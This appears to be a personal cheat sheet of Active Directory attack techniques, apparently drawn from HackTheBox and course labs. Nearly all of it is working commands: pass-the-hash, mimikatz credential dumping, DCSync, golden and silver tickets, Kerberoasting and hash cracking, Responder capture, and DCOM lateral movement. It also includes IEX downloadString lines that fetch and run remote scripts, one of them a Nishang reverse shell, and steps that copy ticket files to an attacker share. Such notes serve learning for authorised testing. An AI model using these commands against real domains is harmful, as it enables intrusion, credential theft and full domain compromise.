Uncategorized

Active Directory

RUNDOWN OF USEFUL TECHNIQUES

======================================================

TGT USE WITH AUTHENTICATION

└─$ kerbrute -dc-ip 10.10.1.299 -domain domain.com -user user01 -password password12345
└─$ KRB5CCNAME=user01.ccache impacket-psexec -k -no-pass domain.com/[email protected]

======================================================

CONNECTIONS VIA CRACKMAPEXEC PTH EVIL-WINRM

FIND ACCOUNT LOCKOUT ATTEMPTS IF ABLE: 
PS C:\Users\computer.corp> net accounts

└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345

└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 -M mimikatz

└─$ crackmapexec smb 10.10.1.299 -u administrator -H'ee0e207898a5beee01f38115019ee2fb' --local-auth --sam

└─$ pth-winexe -U Administrator%ee0e207898a5beee01f38115019ee2fb:ee0e207898a5beee01f38115019ee2fb //10.10.1.299 cmd

└─$ evil-winrm -u user03 -p password12345 -i 10.10.1.299

└─$ xfreerdp /u:user04 /d:domain.com /p:user04:password12345 /v:10.10.1.299

└─$ rdesktop 10.10.1.299 -u user03 -p password12345

C:\tmp>.\psexec.exe \\dc-dc01 cmd.exe (MAYBE...)
THE PTH OPENS A SHELL ON THE DESKTOP, SO REMOTE IN TO DO THIS

mimikatz # sekurlsa::pth /user:user05_admin /domain:corp.com /ntlm:e2b475e11da2a0748290d87ee966e327 /run:PowerShell.exe

======================================================

SCRIPTS

SERVICE ACCOUNTS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')

LIST USERS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')

LIST EVERYTHING
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')

SPECIFY A NAME BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')

POWERVIEW
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')

CHECK CREDENTIALS BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/credentials_script.ps1') <-- ONLY TO VERIFY

KERBEROAST
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')

REVERSE SHELL (NISHANG)
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-PowerShellTcp.ps1')

======================================================

KERBEROAST - NEED PRIV'D ACCOUNT (LIKE ADMINISTRATOR)

IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')

Invoke-Kerberoast -outputformat hashcat | fl
└─$ hashcat -m 13100 svc.hash /usr/share/wordlists/rockyou.txt

======================================================

CREATE REVERSE DNS ENTRY ON THE DC (FROM HTB INTELLIGENCE)

python3 dnstool.py -u 'intelligence\tiffany.molina' -p NewIntelligenceCorpUser9876 -r webstuff.intelligence.htb -a add -t A -d 10.10.14.9 10.129.95.154

VERIFY
└─$ nslookup   
> server 10.129.95.154
> webstuff.intelligence.htb

======================================================

IF YOU SEE GMSA PRIVILEGES (FROM HTB INTELLIGENCE)

└─$ python3 gMSADumper.py -u 'ted.graves' -p Mr.Teddy -d intelligence.htb

LOOKING FOR SERVICE ACCOUNT HASH DUMPS

THIS DUMPS THE HASH FOR THE SERVICE ACCOUNT
svc_int$:::16cba97b4bc423795585b0b4bcee5047

======================================================

TIME SYNC

└─$ timedatectl set-ntp false
└─$ sudo rdate -n dc.intelligence.htb

OPTIONAL: sudo ntpdate 10.129.95.154

======================================================

DC SYNC

mimikatz # lsadump::dcsync /user:Administrator

======================================================

SILVER TICKET

USING SERVICE ACCOUNT DISCOVERED USING GMSA (svc_int$)

└─$ impacket-getST -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes HASH:HASH

└─$ KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass intelligence.htb/[email protected]

======================================================

GOLDEN BUT NOT GOLDEN TICKET

C:\>whoami /user (LOOKING FOR SID)

mimikatz # kerberos::purge
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:user02 /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2555479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:e2b475e11da2a0748290d87ee966e327 /ptt

mimikatz # kerberos::list

READOUT TO GOLDEN:  /user /domain /sid /target /service:HTTP /rc4

NOTE: CAN'T DO THIS WITH CLEAR-TEXT PASSWORD... MUST HASH FIRST

======================================================

GOLDEN TICKET

C:\Tools\active_directory> psexec.exe \\dc01 cmd.exe
ACCESS DENIED WHICH CACHES THE HASH

mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
mimikatz # kerberos::purge
mimikatz # kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599470068 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt
mimikatz # misc::cmd

C:\Users\user02.crop> psexec.exe \\dc01 cmd.exe

======================================================

DCOM - DISTRIBUTED COMPONENT OBJECT MODEL (LATERAL MOVEMENT)
SHOW AVAILABLE METHODS - LOOKING FOR RUN AND WORKBOOK

$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$com | Get-Member

CREATE VBA MACRO (SHELL CODE GOES IN PLACE OF NOTEPAD)
Sub mymacro()
    Shell ("notepad.exe")
End Sub

SCRIPT TO RUN, WILL CONNECT AND RUN THE MACRO
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$LocalPath = "C:\Users\user05_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")

======================================================

SERVICE TICKET REQUEST
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets

PS C:\tmp> Add-Type -AssemblyName System.IdentityModel
PS C:\tmp> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/MSSQL.domain.com'
PS C:\tmp> klist

THEN MIMIKATS
sekurlsa::tickets - we see the ticket for HTTP
kerberos::list /export

THEN SEND THE FILE TO ATTACK COMPUTER
PS C:\tmp> copy .\[email protected]~MSSQL.domain.com-SVCORP.COM.kirbi \\192.168.119.299\share\

THEN CRACK
└─$ ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt mssql.kirbi

CRACK WITH JOHN OR HASHCAT
kirbi2john mssql.kirbi > mssql.hash
john mssql.hash
hashcat -m 5600 user04.hash /usr/share/wordlists/rockyou.txt

======================================================

POWERVIEW

IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')

Get-NetSession -ComputerName client06 (WORKED)

Get-NetLoggedon -ComputerName client06 (WORKED)

======================================================

RESPONDER
└─$ sudo responder -I tun0

THEN REQUEST SMB FILE SHARES VIA AUTHENTICATION
PS C:\tmp\tickets> net use \\192.168.119.299\share /USER:domain.com\user04

ON REMOTE DESKTOP, THIS WORKED, RESPONDER GOT THE RIGHT HASH!!!
PS C:\tmp\tickets> net use \\192.168.119.299\share

MAY ASK FOR USERNAME/PASS... JUST QUIT OUT OF IT (or use domain.com\user03)

======================================================

BLOODHOUND
└─$ python3 /opt/opt/BloodHound.py/bloodhound.py -ns 10.10.1.299 -d domain.com -dc dc-dc02.domain.com -u user03 -p password12345 -c All

sudo neo4j console

BLOUDHOUND GUI - CHANGE PASSWORD http://localhost:7474

bloodhound

IMPORT THE JSON FILES

======================================================

SMB FILE MOVEMENT

AUTHENTICATE: PS C:\tmp\tickets> net use \\192.168.119.299\share student /USER:student

MOVE FILES: PS C:\tmp\tickets> copy .\FILE.kirbi \\192.168.119.299\share\

TO STOP THE SHARE:  net use \\192.168.119.299\share /DELETE

======================================================

AD SCRIPT REFERENCE
ALL ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
	Foreach($prop in $obj.Properties)
		{
			$prop
		}
	Write-Host "------------------------"
}


AD SCRIPT REFERENCE
SERVICE ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
}


AD SCRIPT REFERENCE
LIST USERS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Searcher.FindAll()


AD SCRIPT REFERENCE
CHANGE SCRIPT TO GET A CERTAIN NAME
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="name=Domain Admins"
$Searcher.FindAll()
Scroll to top